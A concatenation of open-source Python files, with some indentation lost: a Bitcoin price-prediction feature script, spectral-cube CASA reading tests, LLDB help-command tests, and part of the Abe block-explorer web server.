# 'Volume_(Currency)__fft_coefficient__coeff_10__attr_"imag"'
# 'Volume_(Currency)__fft_coefficient__coeff_14__attr_"imag"'
# 'Volume_(Currency)__fft_coefficient__coeff_2__attr_"abs"'
# 'Volume_(Currency)__fft_coefficient__coeff_3__attr_"real"'
# 'Volume_(Currency)__fft_coefficient__coeff_4__attr_"real"'
# 'Volume_(Currency)__fft_coefficient__coeff_6__attr_"imag"'
# 'Volume_(Currency)__fft_coefficient__coeff_7__attr_"imag"'
# 'Volume_(Currency)__fft_coefficient__coeff_8__attr_"real"'
def convert(raw_price_data, percentage=False):
    price_data = raw_price_data.astype(float)
    minutes_before = LOOKBACK_MINUTES  # window length in samples; set by load_params()
print('Generating labels...')
close_prices = price_data['Close'].reset_index(drop=True)
open_prices = price_data['Open'].reset_index(drop=True)
labels = pd.Series([0] * len(price_data))
for i in tqdm(range(len(price_data) - 1, minutes_before - 1, -1)):
if close_prices[i] > open_prices[i]:
labels[i] = 1
else:
labels[i] = 0
labels = labels.reset_index(drop=True)[minutes_before:]
print('Removing redundent columns...')
for col in price_data.columns:
if 'high' in col.lower() or 'low' in col.lower() or 'close' in col.lower():
price_data.drop(col, axis=1, inplace=True)
print('Converting into timeseries...')
raw = []
for i in tqdm(range(minutes_before, len(price_data))):
for j in range(minutes_before):
row = price_data.loc[i - minutes_before + j].tolist()
raw.append([i - minutes_before, j] + row)
timeseries = pd.DataFrame(raw, index=None, columns=['id', 'time'] + price_data.columns.tolist())
return timeseries, labels
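# Illustrative shape of the returned values (assuming LOOKBACK_MINUTES == 3 and
# a lone 'Open' column): each prediction window i contributes three rows,
#   id  time  Open
#    0     0  open[i-3]
#    0     1  open[i-2]
#    0     2  open[i-1]
# and labels[i] is 1 when that minute closed above its open, else 0. This long
# format is what extract_best_features() slices back into fixed-size windows.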
def load_params():
config = configparser.ConfigParser()
config.read('../config.ini')
global LOOKBACK_MINUTES
LOOKBACK_MINUTES = int(config['Classifiers']['lookback'])
if __name__ == '__main__':
    main()
| TPeterW/Bitcoin-Price-Prediction | feature_extraction/extract_best_features.py | Python | mit | 4,773 |
from __future__ import print_function, absolute_import, division
import os
import shutil
from itertools import product
import pytest
import numpy as np
from numpy.testing import assert_allclose
from astropy.tests.helper import assert_quantity_allclose
from astropy import units as u
from casa_formats_io import coordsys_to_astropy_wcs
from ..io.casa_masks import make_casa_mask
from .. import StokesSpectralCube, BooleanArrayMask
from .. import SpectralCube, VaryingResolutionSpectralCube
try:
import casatools
from casatools import image
CASA_INSTALLED = True
except ImportError:
try:
from taskinit import ia as image
CASA_INSTALLED = True
except ImportError:
CASA_INSTALLED = False
DATA = os.path.join(os.path.dirname(__file__), 'data')
def make_casa_testimage(infile, outname):
infile = str(infile)
outname = str(outname)
if not CASA_INSTALLED:
raise Exception("Attempted to make a CASA test image in a non-CASA "
"environment")
ia = image()
ia.fromfits(infile=infile, outfile=outname, overwrite=True)
ia.unlock()
ia.close()
ia.done()
cube = SpectralCube.read(infile)
if isinstance(cube, VaryingResolutionSpectralCube):
ia.open(outname)
# populate restoring beam emptily
ia.setrestoringbeam(major={'value':1.0, 'unit':'arcsec'},
minor={'value':1.0, 'unit':'arcsec'},
pa={'value':90.0, 'unit':'deg'},
channel=len(cube.beams)-1,
polarization=-1,
)
# populate each beam (hard assumption of 1 poln)
for channum, beam in enumerate(cube.beams):
casabdict = {'major': {'value':beam.major.to(u.deg).value, 'unit':'deg'},
'minor': {'value':beam.minor.to(u.deg).value, 'unit':'deg'},
'positionangle': {'value':beam.pa.to(u.deg).value, 'unit':'deg'}
}
ia.setrestoringbeam(beam=casabdict, channel=channum, polarization=0)
ia.unlock()
ia.close()
ia.done()
@pytest.fixture
def filename(request):
return request.getfixturevalue(request.param)
@pytest.mark.parametrize(('memmap', 'bigendian'), product((False, True), (False, True)))
def test_casa_read_basic(memmap, bigendian):
# Check that SpectralCube.read works for an example CASA dataset stored
# in the tests directory. This test should NOT require CASA, whereas a
# number of tests below require CASA to generate test datasets. The present
# test is to ensure CASA is not required for reading.
if bigendian:
cube = SpectralCube.read(os.path.join(DATA, 'basic_bigendian.image'), memmap=memmap)
else:
cube = SpectralCube.read(os.path.join(DATA, 'basic.image'), memmap=memmap)
assert cube.shape == (3, 4, 5)
assert_allclose(cube.wcs.pixel_to_world_values(1, 2, 3),
[2.406271e+01, 2.993521e+01, 1.421911e+09])
# Carry out an operation to make sure the underlying data array works
cube.moment0()
# Slice the dataset
assert_quantity_allclose(cube.unmasked_data[0, 0, :],
[1, 1, 1, 1, 1] * u.Jy / u.beam)
assert_quantity_allclose(cube.unmasked_data[0, 1, 2], 1 * u.Jy / u.beam)
def test_casa_read_basic_nodask():
# For CASA datasets, the default when reading cubes is use_dask=True.
# Here we check that setting use_dask=False explicitly raises an error.
with pytest.raises(ValueError, match='Loading CASA datasets is not possible with use_dask=False'):
SpectralCube.read(os.path.join(DATA, 'basic.image'), use_dask=False)
def test_casa_read_basic_nomask():
# Make sure things work well if there is no mask in the data
cube = SpectralCube.read(os.path.join(DATA, 'nomask.image'))
assert cube.shape == (3, 4, 5)
assert_allclose(cube.wcs.pixel_to_world_values(1, 2, 3),
[2.406271e+01, 2.993521e+01, 1.421911e+09])
# Carry out an operation to make sure the underlying data array works
cube.moment0()
# Slice the dataset
assert_quantity_allclose(cube.unmasked_data[0, 0, :],
[1, 1, 1, 1, 1] * u.Jy / u.beam)
assert_quantity_allclose(cube.unmasked_data[0, 1, 2], 1 * u.Jy / u.beam)
# Slice the cube
assert_quantity_allclose(cube[:, 0, 0],
[1, 1, 1] * u.Jy / u.beam)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
@pytest.mark.parametrize('filename', ('data_adv', 'data_advs', 'data_sdav',
'data_vad', 'data_vsad'),
indirect=['filename'])
def test_casa_read(filename, tmp_path):
# Check that SpectralCube.read returns data with the same shape and values
# if read from CASA as if read from FITS.
cube = SpectralCube.read(filename)
make_casa_testimage(filename, tmp_path / 'casa.image')
casacube = SpectralCube.read(tmp_path / 'casa.image')
assert casacube.shape == cube.shape
assert_allclose(casacube.unmasked_data[:].value,
cube.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
@pytest.mark.parametrize('filename', ('data_adv', 'data_advs', 'data_sdav',
'data_vad', 'data_vsad'),
indirect=['filename'])
def test_casa_read_nomask(filename, tmp_path):
# As for test_casa_read, but we remove the mask to make sure
# that we can still read in the cubes
cube = SpectralCube.read(filename)
make_casa_testimage(filename, tmp_path / 'casa.image')
shutil.rmtree(tmp_path / 'casa.image' / 'mask0')
casacube = SpectralCube.read(tmp_path / 'casa.image')
assert casacube.shape == cube.shape
assert_allclose(casacube.unmasked_data[:].value,
cube.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_read_stokes(data_advs, tmp_path):
# Check that StokesSpectralCube.read returns data with the same shape and values
# if read from CASA as if read from FITS.
cube = StokesSpectralCube.read(data_advs)
make_casa_testimage(data_advs, tmp_path / 'casa.image')
casacube = StokesSpectralCube.read(tmp_path / 'casa.image')
assert casacube.I.shape == cube.I.shape
assert_allclose(casacube.I.unmasked_data[:].value,
cube.I.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_mask(data_adv, tmp_path):
# This tests the make_casa_mask function which can be used to create a mask
# file in an existing image.
cube = SpectralCube.read(data_adv)
mask_array = np.array([[True, False], [False, False], [True, True]])
bool_mask = BooleanArrayMask(mask=mask_array, wcs=cube._wcs,
shape=cube.shape)
cube = cube.with_mask(bool_mask)
make_casa_mask(cube, str(tmp_path / 'casa.mask'), add_stokes=False,
append_to_image=False, overwrite=True)
ia = casatools.image()
ia.open(str(tmp_path / 'casa.mask'))
casa_mask = ia.getchunk()
coords = ia.coordsys()
ia.unlock()
ia.close()
ia.done()
# Test masks
# Mask array is broadcasted to the cube shape. Mimic this, switch to ints,
# and transpose to match CASA image.
compare_mask = np.tile(mask_array, (4, 1, 1)).astype('int16').T
assert np.all(compare_mask == casa_mask)
# Test WCS info
# Convert back to an astropy wcs object so transforms are dealt with.
casa_wcs = coordsys_to_astropy_wcs(coords.torecord())
header = casa_wcs.to_header() # Invokes transform
# Compare some basic properties EXCLUDING the spectral axis
assert_allclose(cube.wcs.wcs.crval[:2], casa_wcs.wcs.crval[:2])
assert_allclose(cube.wcs.wcs.cdelt[:2], casa_wcs.wcs.cdelt[:2])
assert np.all(list(cube.wcs.wcs.cunit)[:2] == list(casa_wcs.wcs.cunit)[:2])
assert np.all(list(cube.wcs.wcs.ctype)[:2] == list(casa_wcs.wcs.ctype)[:2])
assert_allclose(cube.wcs.wcs.crpix, casa_wcs.wcs.crpix)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_mask_append(data_adv, tmp_path):
# This tests the append option for the make_casa_mask function
cube = SpectralCube.read(data_adv)
mask_array = np.array([[True, False], [False, False], [True, True]])
bool_mask = BooleanArrayMask(mask=mask_array, wcs=cube._wcs,
shape=cube.shape)
cube = cube.with_mask(bool_mask)
make_casa_testimage(data_adv, tmp_path / 'casa.image')
# in this case, casa.mask is the name of the mask, not its path
make_casa_mask(cube, 'casa.mask', append_to_image=True,
img=str(tmp_path / 'casa.image'), add_stokes=False, overwrite=True)
assert os.path.exists(tmp_path / 'casa.image/casa.mask')
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_beams(data_adv, data_adv_beams, tmp_path):
# Test both make_casa_testimage and the beam reading tools using casa's
# image reader
make_casa_testimage(data_adv, tmp_path / 'casa_adv.image')
make_casa_testimage(data_adv_beams, tmp_path / 'casa_adv_beams.image')
cube = SpectralCube.read(tmp_path / 'casa_adv.image', format='casa_image')
assert hasattr(cube, 'beam')
cube_beams = SpectralCube.read(tmp_path / 'casa_adv_beams.image', format='casa_image')
assert hasattr(cube_beams, 'beams')
assert isinstance(cube_beams, VaryingResolutionSpectralCube)
| radio-astro-tools/spectral-cube | spectral_cube/tests/test_casafuncs.py | Python | bsd-3-clause | 9,896 |
"""
Test some lldb help commands.
See also CommandInterpreter::OutputFormattedHelpText().
"""
from __future__ import print_function
import os
import time
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class HelpCommandTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@no_debug_info_test
def test_simplehelp(self):
"""A simple test of 'help' command and its output."""
self.expect("help",
startstr='Debugger commands:')
self.expect("help -a", matching=False,
substrs=['next'])
self.expect("help", matching=True,
substrs=['next'])
@no_debug_info_test
def test_help_on_help(self):
"""Testing the help on the help facility."""
self.expect("help help", matching=True,
substrs=['--hide-aliases',
'--hide-user-commands'])
@no_debug_info_test
def version_number_string(self):
"""Helper function to find the version number string of lldb."""
plist = os.path.join(
os.environ["LLDB_SRC"],
"resources",
"LLDB-Info.plist")
try:
CFBundleVersionSegFound = False
with open(plist, 'r') as f:
for line in f:
if CFBundleVersionSegFound:
version_line = line.strip()
import re
m = re.match("<string>(.*)</string>", version_line)
if m:
version = m.group(1)
return version
else:
                            # Unsuccessful, let's just break out of the for
# loop.
break
if line.find("<key>CFBundleVersion</key>") != -1:
# Found our match. The next line contains our version
# string, for example:
#
# <string>38</string>
CFBundleVersionSegFound = True
except:
# Just fallthrough...
import traceback
traceback.print_exc()
pass
# Use None to signify that we are not able to grok the version number.
return None
@no_debug_info_test
def test_help_arch(self):
"""Test 'help arch' which should list of supported architectures."""
self.expect("help arch",
substrs=['arm', 'x86_64', 'i386'])
@no_debug_info_test
def test_help_version(self):
"""Test 'help version' and 'version' commands."""
self.expect("help version",
substrs=['Show the LLDB debugger version.'])
import re
version_str = self.version_number_string()
match = re.match('[0-9]+', version_str)
search_regexp = ['lldb( version|-' + (version_str if match else '[0-9]+') + ').*\n']
self.expect("version",
patterns=search_regexp)
@no_debug_info_test
def test_help_should_not_crash_lldb(self):
"""Command 'help disasm' should not crash lldb."""
self.runCmd("help disasm", check=False)
self.runCmd("help unsigned-integer")
@no_debug_info_test
def test_help_should_not_hang_emacsshell(self):
"""Command 'settings set term-width 0' should not hang the help command."""
self.expect(
"settings set term-width 0",
COMMAND_FAILED_AS_EXPECTED,
error=True,
substrs=['error: 0 is out of range, valid values must be between'])
# self.runCmd("settings set term-width 0")
self.expect("help",
startstr='Debugger commands:')
@no_debug_info_test
def test_help_breakpoint_set(self):
"""Test that 'help breakpoint set' does not print out redundant lines of:
'breakpoint set [-s <shlib-name>] ...'."""
self.expect("help breakpoint set", matching=False,
substrs=['breakpoint set [-s <shlib-name>]'])
@no_debug_info_test
def test_help_image_dump_symtab_should_not_crash(self):
"""Command 'help image dump symtab' should not crash lldb."""
# 'image' is an alias for 'target modules'.
self.expect("help image dump symtab",
substrs=['dump symtab',
'sort-order'])
@no_debug_info_test
def test_help_image_du_sym_is_ambiguous(self):
"""Command 'help image du sym' is ambiguous and spits out the list of candidates."""
self.expect("help image du sym",
COMMAND_FAILED_AS_EXPECTED, error=True,
substrs=['error: ambiguous command image du sym',
'symfile',
'symtab'])
@no_debug_info_test
def test_help_image_du_line_should_work(self):
"""Command 'help image du line-table' is not ambiguous and should work."""
# 'image' is an alias for 'target modules'.
self.expect("help image du line", substrs=[
'Dump the line table for one or more compilation units'])
@no_debug_info_test
def test_help_target_variable_syntax(self):
"""Command 'help target variable' should display <variable-name> ..."""
self.expect("help target variable",
substrs=['<variable-name> [<variable-name> [...]]'])
@no_debug_info_test
def test_help_watchpoint_and_its_args(self):
"""Command 'help watchpoint', 'help watchpt-id', and 'help watchpt-id-list' should work."""
self.expect("help watchpoint",
substrs=['delete', 'disable', 'enable', 'list'])
self.expect("help watchpt-id",
substrs=['<watchpt-id>'])
self.expect("help watchpt-id-list",
substrs=['<watchpt-id-list>'])
@no_debug_info_test
def test_help_watchpoint_set(self):
"""Test that 'help watchpoint set' prints out 'expression' and 'variable'
as the possible subcommands."""
self.expect("help watchpoint set",
substrs=['The following subcommands are supported:'],
patterns=['expression +--',
'variable +--'])
@no_debug_info_test
def test_help_po_hides_options(self):
"""Test that 'help po' does not show all the options for expression"""
self.expect(
"help po",
substrs=[
'--show-all-children',
'--object-description'],
matching=False)
@no_debug_info_test
def test_help_run_hides_options(self):
"""Test that 'help run' does not show all the options for process launch"""
self.expect("help run",
substrs=['--arch', '--environment'], matching=False)
@no_debug_info_test
def test_help_next_shows_options(self):
"""Test that 'help next' shows all the options for thread step-over"""
self.expect("help next",
substrs=['--python-class', '--run-mode'], matching=True)
@no_debug_info_test
def test_help_provides_alternatives(self):
"""Test that help on commands that don't exist provides information on additional help avenues"""
self.expect(
"help thisisnotadebuggercommand",
substrs=[
"'thisisnotadebuggercommand' is not a known command.",
"Try 'help' to see a current list of commands.",
"Try 'apropos thisisnotadebuggercommand' for a list of related commands.",
"Try 'type lookup thisisnotadebuggercommand' for information on types, methods, functions, modules, etc."],
error=True)
self.expect(
"help process thisisnotadebuggercommand",
substrs=[
"'process thisisnotadebuggercommand' is not a known command.",
"Try 'help' to see a current list of commands.",
"Try 'apropos thisisnotadebuggercommand' for a list of related commands.",
"Try 'type lookup thisisnotadebuggercommand' for information on types, methods, functions, modules, etc."])
@no_debug_info_test
def test_custom_help_alias(self):
"""Test that aliases pick up custom help text."""
def cleanup():
self.runCmd('command unalias afriendlyalias', check=False)
self.runCmd('command unalias averyfriendlyalias', check=False)
self.addTearDownHook(cleanup)
self.runCmd(
'command alias --help "I am a friendly alias" -- afriendlyalias help')
self.expect(
"help afriendlyalias",
matching=True,
substrs=['I am a friendly alias'])
self.runCmd(
'command alias --long-help "I am a very friendly alias" -- averyfriendlyalias help')
self.expect("help averyfriendlyalias", matching=True,
substrs=['I am a very friendly alias'])
@no_debug_info_test
def test_help_format_output(self):
"""Test that help output reaches TerminalWidth."""
self.runCmd(
'settings set term-width 108')
self.expect(
"help format",
matching=True,
substrs=['<format> -- One of the format names'])
| youtube/cobalt | third_party/llvm-project/lldb/packages/Python/lldbsuite/test/help/TestHelp.py | Python | bsd-3-clause | 9,505 |
#!/usr/bin/env python
# Copyright(C) 2011,2012,2013,2014 by Abe developers.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/agpl.html>.
import sys
import os
import optparse
import re
from cgi import escape
import posixpath
import wsgiref.util
import time
import calendar
import math
import logging
import json
import version
import DataStore
import readconf
# bitcointools -- modified deserialize.py to return raw transaction
import deserialize
import util # Added functions.
import base58
__version__ = version.__version__
ABE_APPNAME = "Abe"
ABE_VERSION = __version__
ABE_URL = 'https://github.com/bitcoin-abe/bitcoin-abe'
COPYRIGHT_YEARS = '2011'
COPYRIGHT = "Abe developers"
COPYRIGHT_URL = 'https://github.com/bitcoin-abe'
TIME1970 = time.strptime('1970-01-01','%Y-%m-%d')
EPOCH1970 = calendar.timegm(TIME1970)
# Abe-generated content should all be valid HTML and XHTML fragments.
# Configurable templates may contain either. HTML seems better supported
# under Internet Explorer.
DEFAULT_CONTENT_TYPE = "text/html; charset=utf-8"
DEFAULT_HOMEPAGE = "chain/Maxcoin"
DONATIONS_BTC = ""
DONATIONS_NMC = ""
DEFAULT_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<link rel="stylesheet" type="text/css"
href="%(dotdot)s%(STATIC_PATH)sabe.css" />
<link rel="shortcut icon" href="%(dotdot)s%(STATIC_PATH)sfavicon.ico" />
<title>%(title)s</title>
</head>
<body style="text-align: center;">
<h1><a href="%(dotdot)s%(HOMEPAGE)s"><img
src="%(dotdot)s%(STATIC_PATH)smaxexplorer.png" alt="Max Explorer" /></a></h1>
%(body)s
<p><a href="%(dotdot)sq">API</a> (machine-readable pages)</p>
<p style="font-size: smaller">
<span style="font-style: italic">
Powered by <a href="%(ABE_URL)s">%(APPNAME)s</a>
</span>
%(download)s
</p>
</body>
</html>
"""
DEFAULT_LOG_FORMAT = "%(message)s"
DEFAULT_DECIMALS = 8
# It is fun to change "6" to "3" and search lots of addresses.
ADDR_PREFIX_RE = re.compile('[1-9A-HJ-NP-Za-km-z]{6,}\\Z')
HEIGHT_RE = re.compile('(?:0|[1-9][0-9]*)\\Z')
HASH_PREFIX_RE = re.compile('[0-9a-fA-F]{0,64}\\Z')
HASH_PREFIX_MIN = 6
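# For example, ADDR_PREFIX_RE matches base58 prefixes such as '1PC9aZ' (six or
# more characters drawn from the base58 alphabet, which excludes 0, O, I and l),
# HEIGHT_RE matches unsigned decimal heights such as '0' or '273519', and
# HASH_PREFIX_RE matches up to 64 hex digits, with prefixes shorter than
# HASH_PREFIX_MIN rejected by is_hash_prefix().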
NETHASH_HEADER = """\
blockNumber: height of last block in interval + 1
time: block time in seconds since 0h00 1 Jan 1970 UTC
target: decimal target at blockNumber
avgTargetSinceLast: harmonic mean of target over interval
difficulty: difficulty at blockNumber
hashesToWin: expected number of hashes needed to solve a block at this difficulty
avgIntervalSinceLast: interval seconds divided by blocks
netHashPerSecond: estimated network hash rate over interval
Statistical values are approximate and differ slightly from http://blockexplorer.com/q/nethash.
/chain/CHAIN/q/nethash[/INTERVAL[/START[/STOP]]]
Default INTERVAL=144, START=0, STOP=infinity.
Negative values back from the last block.
Append ?format=json to URL for headerless, JSON output.
blockNumber,time,target,avgTargetSinceLast,difficulty,hashesToWin,avgIntervalSinceLast,netHashPerSecond
START DATA
"""
NETHASH_SVG_TEMPLATE = """\
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xmlns:abe="http://abe.bit/abe"
viewBox="0 0 300 200"
preserveAspectRatio="none"
onload="Abe.draw(this)">
<style>
#chart polyline {
stroke-width: 0.1%%;
fill-opacity: 0;
    stroke-opacity: 0.5;
  }
</style>
<script type="application/ecmascript"
xlink:href="%(dotdot)s%(STATIC_PATH)snethash.js"/>
<g id="chart">
<polyline abe:window="1d" style="stroke: red;"/>
<polyline abe:window="3d" style="stroke: orange;"/>
<polyline abe:window="7d" style="stroke: yellow;"/>
<polyline abe:window="14d" style="stroke: green;"/>
<polyline abe:window="30d" style="stroke: blue;"/>
%(body)s
</g>
</svg>
"""
# How many addresses to accept in /unspent/ADDR|ADDR|...
MAX_UNSPENT_ADDRESSES = 200
def make_store(args):
store = DataStore.new(args)
if (not args.no_load):
store.catch_up()
return store
class NoSuchChainError(Exception):
"""Thrown when a chain lookup fails"""
class PageNotFound(Exception):
"""Thrown when code wants to return 404 Not Found"""
class Redirect(Exception):
"""Thrown when code wants to redirect the request"""
class Streamed(Exception):
"""Thrown when code has written the document to the callable
returned by start_response."""
class Abe:
def __init__(abe, store, args):
abe.store = store
abe.args = args
abe.htdocs = args.document_root or find_htdocs()
abe.static_path = '' if args.static_path is None else args.static_path
abe.template_vars = args.template_vars.copy()
abe.template_vars['STATIC_PATH'] = (
abe.template_vars.get('STATIC_PATH', abe.static_path))
abe.template = flatten(args.template)
abe.debug = args.debug
abe.log = logging.getLogger(__name__)
abe.log.info('Abe initialized.')
abe.home = str(abe.template_vars.get("HOMEPAGE", DEFAULT_HOMEPAGE))
if not args.auto_agpl:
abe.template_vars['download'] = (
abe.template_vars.get('download', ''))
abe.base_url = args.base_url
abe.address_history_rows_max = int(
args.address_history_rows_max or 1000)
if args.shortlink_type is None:
abe.shortlink_type = ("firstbits" if store.use_firstbits else
"non-firstbits")
else:
abe.shortlink_type = args.shortlink_type
if abe.shortlink_type != "firstbits":
abe.shortlink_type = int(abe.shortlink_type)
if abe.shortlink_type < 2:
raise ValueError("shortlink-type: 2 character minimum")
elif not store.use_firstbits:
abe.shortlink_type = "non-firstbits"
abe.log.warning("Ignoring shortlink-type=firstbits since" +
" the database does not support it.")
if abe.shortlink_type == "non-firstbits":
abe.shortlink_type = 10
def __call__(abe, env, start_response):
import urlparse
page = {
"status": '200 OK',
"title": [escape(ABE_APPNAME), " ", ABE_VERSION],
"body": [],
"env": env,
"params": {},
"dotdot": "../" * (env['PATH_INFO'].count('/') - 1),
"start_response": start_response,
"content_type": str(abe.template_vars['CONTENT_TYPE']),
"template": abe.template,
"chain": None,
}
if 'QUERY_STRING' in env:
page['params'] = urlparse.parse_qs(env['QUERY_STRING'])
if abe.fix_path_info(env):
abe.log.debug("fixed path_info")
return redirect(page)
cmd = wsgiref.util.shift_path_info(env)
handler = abe.get_handler(cmd)
tvars = abe.template_vars.copy()
tvars['dotdot'] = page['dotdot']
page['template_vars'] = tvars
try:
if handler is None:
return abe.serve_static(cmd + env['PATH_INFO'], start_response)
if (not abe.args.no_load):
                # Always be up-to-date, even if it means having to wait
# for a response! XXX Could use threads, timers, or a
# cron job.
abe.store.catch_up()
handler(page)
except PageNotFound:
page['status'] = '404 Not Found'
page['body'] = ['<p class="error">Sorry, ', env['SCRIPT_NAME'],
env['PATH_INFO'],
' does not exist on this server.</p>']
except NoSuchChainError, e:
page['body'] += [
'<p class="error">'
'Sorry, I don\'t know about that chain!</p>\n']
except Redirect:
return redirect(page)
except Streamed:
return ''
except Exception:
abe.store.rollback()
raise
abe.store.rollback() # Close implicitly opened transaction.
start_response(page['status'],
[('Content-type', page['content_type']),
('Cache-Control', 'max-age=30')])
tvars['title'] = flatten(page['title'])
tvars['h1'] = flatten(page.get('h1') or page['title'])
tvars['body'] = flatten(page['body'])
if abe.args.auto_agpl:
tvars['download'] = (
' <a href="' + page['dotdot'] + 'download">Source</a>')
content = page['template'] % tvars
if isinstance(content, unicode):
content = content.encode('UTF-8')
return content
def get_handler(abe, cmd):
return getattr(abe, 'handle_' + cmd, None)
def handle_chains(abe, page):
page['title'] = 'Max Explorer'
body = page['body']
body += [
abe.search_form(page),
'<table style="margin-right: auto; margin-left: auto;">\n',
'<tr><th>Currency</th><th>Code</th><th>Block</th><th>Time</th>',
'<th>Started</th><th>Age (days)</th><th>Coins Created</th>',
'<th>Avg Coin Age</th><th>',
'% <a href="https://en.bitcoin.it/wiki/Bitcoin_Days_Destroyed">',
'CoinDD</a></th>',
'</tr>\n']
now = time.time() - EPOCH1970
rows = abe.store.selectall("""
SELECT c.chain_name, b.block_height, b.block_nTime, b.block_hash,
b.block_total_seconds, b.block_total_satoshis,
b.block_satoshi_seconds,
b.block_total_ss
FROM chain c
JOIN block b ON (c.chain_last_block_id = b.block_id)
ORDER BY c.chain_name
""")
for row in rows:
name = row[0]
chain = abe.store.get_chain_by_name(name)
if chain is None:
abe.log.warning("Store does not know chain: %s", name)
continue
body += [
'<tr><td><a href="chain/', escape(name), '">',
escape(name), '</a></td><td>', escape(chain.code3), '</td>']
if row[1] is not None:
(height, nTime, hash) = (
int(row[1]), int(row[2]), abe.store.hashout_hex(row[3]))
body += [
'<td><a href="block/', hash, '">', height, '</a></td>',
'<td>', format_time(nTime), '</td>']
if row[6] is not None and row[7] is not None:
(seconds, satoshis, ss, total_ss) = (
int(row[4]), int(row[5]), int(row[6]), int(row[7]))
started = nTime - seconds
chain_age = now - started
since_block = now - nTime
if satoshis == 0:
avg_age = ' '
else:
avg_age = '%5g' % ((float(ss) / satoshis + since_block)
/ 86400.0)
if chain_age <= 0:
percent_destroyed = ' '
else:
more = since_block * satoshis
denominator = total_ss + more
if denominator <= 0:
percent_destroyed = ' '
else:
percent_destroyed = '%5g%%' % (
100.0 - (100.0 * (ss + more) / denominator))
body += [
'<td>', format_time(started)[:10], '</td>',
'<td>', '%5g' % (chain_age / 86400.0), '</td>',
'<td>', format_satoshis(satoshis, chain), '</td>',
'<td>', avg_age, '</td>',
'<td>', percent_destroyed, '</td>']
body += ['</tr>\n']
body += ['</table>\n']
if len(rows) == 0:
body += ['<p>No block data found.</p>\n']
def chain_lookup_by_name(abe, symbol):
if symbol is None:
ret = abe.get_default_chain()
else:
ret = abe.store.get_chain_by_name(symbol)
if ret is None:
raise NoSuchChainError()
return ret
def get_default_chain(abe):
return abe.store.get_default_chain()
def format_addresses(abe, data, dotdot, chain):
if data['binaddr'] is None:
return 'Unknown'
if 'subbinaddr' in data:
# Multisig or known P2SH.
ret = [hash_to_address_link(chain.script_addr_vers, data['binaddr'], dotdot, text='Escrow'),
' ', data['required_signatures'], ' of']
for binaddr in data['subbinaddr']:
ret += [' ', hash_to_address_link(data['address_version'], binaddr, dotdot, 10)]
return ret
return hash_to_address_link(data['address_version'], data['binaddr'], dotdot)
def call_handler(abe, page, cmd):
handler = abe.get_handler(cmd)
if handler is None:
raise PageNotFound()
handler(page)
def handle_chain(abe, page):
symbol = wsgiref.util.shift_path_info(page['env'])
chain = abe.chain_lookup_by_name(symbol)
page['chain'] = chain
cmd = wsgiref.util.shift_path_info(page['env'])
if cmd == '':
page['env']['SCRIPT_NAME'] = page['env']['SCRIPT_NAME'][:-1]
raise Redirect()
if cmd == 'chain' or cmd == 'chains':
raise PageNotFound()
if cmd is not None:
abe.call_handler(page, cmd)
return
page['title'] = chain.name
body = page['body']
body += abe.search_form(page)
count = get_int_param(page, 'count') or 20
hi = get_int_param(page, 'hi')
orig_hi = hi
if hi is None:
row = abe.store.selectrow("""
SELECT b.block_height
FROM block b
JOIN chain c ON (c.chain_last_block_id = b.block_id)
WHERE c.chain_id = ?
""", (chain.id,))
if row:
hi = row[0]
if hi is None:
if orig_hi is None and count > 0:
body += ['<p>I have no blocks in this chain.</p>']
else:
body += ['<p class="error">'
'The requested range contains no blocks.</p>\n']
return
rows = abe.store.selectall("""
SELECT b.block_hash, b.block_height, b.block_nTime, b.block_num_tx,
b.block_nBits, b.block_value_out,
b.block_total_seconds, b.block_satoshi_seconds,
b.block_total_satoshis, b.block_ss_destroyed,
b.block_total_ss
FROM block b
JOIN chain_candidate cc ON (b.block_id = cc.block_id)
WHERE cc.chain_id = ?
AND cc.block_height BETWEEN ? AND ?
AND cc.in_longest = 1
ORDER BY cc.block_height DESC LIMIT ?
""", (chain.id, hi - count + 1, hi, count))
if hi is None:
hi = int(rows[0][1])
basename = os.path.basename(page['env']['PATH_INFO'])
nav = ['<a href="',
basename, '?count=', str(count), '"><<</a>']
nav += [' <a href="', basename, '?hi=', str(hi + count),
'&count=', str(count), '"><</a>']
nav += [' ', '>']
if hi >= count:
nav[-1] = ['<a href="', basename, '?hi=', str(hi - count),
'&count=', str(count), '">', nav[-1], '</a>']
nav += [' ', '>>']
if hi != count - 1:
nav[-1] = ['<a href="', basename, '?hi=', str(count - 1),
'&count=', str(count), '">', nav[-1], '</a>']
for c in (20, 50, 100, 500, 2016):
nav += [' ']
if c != count:
nav += ['<a href="', basename, '?count=', str(c)]
if hi is not None:
nav += ['&hi=', str(max(hi, c - 1))]
nav += ['">']
nav += [' ', str(c)]
if c != count:
nav += ['</a>']
nav += [' <a href="', page['dotdot'], '">Search</a>']
extra = False
#extra = True
body += ['<p>', nav, '</p>\n',
'<table style="margin-right: auto; margin-left: auto;"><tr><th>Block</th><th>Approx. Time</th>',
'<th>Transactions</th><th>Value Out</th>',
'<th>Difficulty</th><th>Outstanding</th>',
'<th>Average Age</th><th>Chain Age</th>',
'<th>% ',
'<a href="https://en.bitcoin.it/wiki/Bitcoin_Days_Destroyed">',
'CoinDD</a></th>',
['<th>Satoshi-seconds</th>',
'<th>Total ss</th>']
if extra else '',
'</tr>\n']
